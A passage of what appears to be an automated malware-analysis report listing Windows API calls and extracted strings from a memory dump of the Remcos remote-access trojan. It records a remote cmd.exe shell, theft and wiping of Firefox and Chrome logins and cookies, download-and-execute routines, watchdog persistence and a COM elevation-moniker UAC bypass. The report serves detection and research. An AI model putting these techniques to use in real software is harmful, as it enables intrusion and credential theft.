              • String ID:
              APIs
              • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
              • WSASetLastError.WS2_32(00000000), ref: 00414F10
                • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
              • String ID:
              APIs
                • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              APIs
              • API ID: __alldvrm
              • String ID:
              APIs
              • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • API ID: AllocateHeap
              • String ID:
              APIs
              • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
              • API ID: Startup
              • String ID:
              APIs
              • API ID: send
              • String ID:
              APIs
              • API ID: recv
              • String ID:
              APIs
              • SetEvent.KERNEL32(?,?), ref: 00407CB9
              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
              • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
              • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
              • DeleteFileA.KERNEL32(?), ref: 00408652
                • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
              • Sleep.KERNEL32(000007D0), ref: 004086F8
              • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
              Strings
              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
              • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
              APIs
              • __Init_thread_footer.LIBCMT ref: 004056E6
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • __Init_thread_footer.LIBCMT ref: 00405723
              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
              • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
              • CloseHandle.KERNEL32 ref: 00405A23
              • CloseHandle.KERNEL32 ref: 00405A2B
              • CloseHandle.KERNEL32 ref: 00405A3D
              • CloseHandle.KERNEL32 ref: 00405A45
              Strings
              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
              APIs
              • GetCurrentProcessId.KERNEL32 ref: 00412106
                • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
              • OpenMutexA.KERNEL32 ref: 00412146
              • CloseHandle.KERNEL32(00000000), ref: 00412155
              • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
              Strings
              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
              • FindClose.KERNEL32(00000000), ref: 0040BBC9
              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
              • FindClose.KERNEL32(00000000), ref: 0040BD12
              Strings
              • API ID: Find$CloseFile$FirstNext
              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
              APIs
              • OpenClipboard.USER32 ref: 004168C2
              • EmptyClipboard.USER32 ref: 004168D0
              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
              • GlobalLock.KERNEL32 ref: 004168F9
              • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
              • SetClipboardData.USER32 ref: 00416938
              • CloseClipboard.USER32 ref: 00416955
              • OpenClipboard.USER32 ref: 0041695C
              • GetClipboardData.USER32 ref: 0041696C
              • GlobalLock.KERNEL32 ref: 00416975
              • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
              • CloseClipboard.USER32 ref: 00416984
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
              • String ID: !D@
              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
              • FindClose.KERNEL32(00000000), ref: 0040BDC9
              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
              • FindClose.KERNEL32(00000000), ref: 0040BEAF
              • FindClose.KERNEL32(00000000), ref: 0040BED0
              Strings
              • API ID: Find$Close$File$FirstNext
              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
              • CloseHandle.KERNEL32(00000000), ref: 0040F563
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • CloseHandle.KERNEL32(00000000), ref: 0040F66E
              Strings
              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
              Strings
              • API ID:
              • String ID: 0$1$2$3$4$5$6$7$VG
              APIs
              • _wcslen.LIBCMT ref: 00407521
              • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
              Strings
              • API ID: Object_wcslen
              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              APIs
              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
              • GetLastError.KERNEL32 ref: 0041A7BB
              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
              • API ID: EnumServicesStatus$ErrorLastManagerOpen
              • String ID:
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
              • IsValidCodePage.KERNEL32(00000000), ref: 00452777
              • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
              • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
              Strings
              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
              • String ID: lJD$lJD$lJD
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
              • FindClose.KERNEL32(00000000), ref: 0040C47D
              • FindClose.KERNEL32(00000000), ref: 0040C4A8
              Strings
              • API ID: Find$CloseFile$FirstNext
              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
              APIs
              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
              • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
              • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
              • String ID:
              APIs
              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              Strings
              • API ID: File$Find$CreateFirstNext
              • String ID: 8SG$PXG$PXG$NG$PG
              APIs
              • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
              • RegCloseKey.ADVAPI32(?), ref: 004140A9
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
              • GetProcAddress.KERNEL32(00000000), ref: 00414271
              Strings
              • API ID: AddressCloseCreateLibraryLoadProcsend
              • String ID: SHDeleteKeyW$Shlwapi.dll
              APIs
              • _free.LIBCMT ref: 00449212
              • _free.LIBCMT ref: 00449236
              • _free.LIBCMT ref: 004493BD
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
              • _free.LIBCMT ref: 00449589
              • API ID: _free$ByteCharMultiWide$InformationTimeZone
              • String ID:
              APIs
                • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
              • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
              • GetProcAddress.KERNEL32(00000000), ref: 00416872
              Strings
              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
              • String ID: !D@$PowrProf.dll$SetSuspendState
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
              • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
              • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
              Strings
              • API ID: InfoLocale
              • String ID: ACP$OCP$['E
              APIs
              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
              • GetLastError.KERNEL32 ref: 0040BA58
              Strings
              • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
              • UserProfile, xrefs: 0040BA1E
              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
              • [Chrome StoredLogins not found], xrefs: 0040BA72
              • API ID: DeleteErrorFileLast
              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
              APIs
              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
              • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
              • GetLastError.KERNEL32 ref: 0041799D
              Strings
              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
              • String ID: SeShutdownPrivilege
              APIs
              • __EH_prolog.LIBCMT ref: 00409258
                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
              • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
              • FindClose.KERNEL32(00000000), ref: 004093C1
                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
              • FindClose.KERNEL32(00000000), ref: 004095B9
                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
              • String ID:
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
              • API ID: Service$CloseHandle$Open$ManagerStart
              • String ID:
              APIs
              • FindResourceA.KERNEL32 ref: 0041B4B9
              • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
              • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
              • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
              Strings
              • API ID: Resource$FindLoadLockSizeof
              • String ID: SETTINGS
              APIs
              • __EH_prolog.LIBCMT ref: 0040966A
              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
              • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
              • API ID: Find$File$CloseFirstH_prologNext
              • String ID:
              APIs
              • __EH_prolog.LIBCMT ref: 00408811
              • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
              • String ID:
              • API String ID: 1771804793-0
              APIs
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: DownloadExecuteFileShell
              • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$open
              • API String ID: 2825088817-1632494013
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: FileFind$FirstNextsend
              • String ID: XPG$XPG
              • API String ID: 4113138495-1962359302
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
              • String ID: sJD
              • API String ID: 1661935332-3536923933
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: ErrorInfoLastLocale$_free$_abort
              • String ID:
              • API String ID: 2829624132-0
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
              • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              APIs
              • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
              • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
              • ExitProcess.KERNEL32 ref: 004432EF
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: Clipboard$CloseDataOpen
              • String ID:
              • API String ID: 2058664381-0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID:
              • String ID: .
              • API String ID: 0-248832578
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID: lJD
              • API String ID: 1084509184-3316369744
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID: lJD
              • API String ID: 1084509184-3316369744
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: InfoLocale
              • String ID: GetLocaleInfoEx
              • API String ID: 2299586839-2904428671
              APIs
              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
              • HeapFree.KERNEL32(00000000), ref: 004120EE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: ErrorLast$_free$InfoLocale_abort
              • String ID:
              • API String ID: 1663032902-0
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
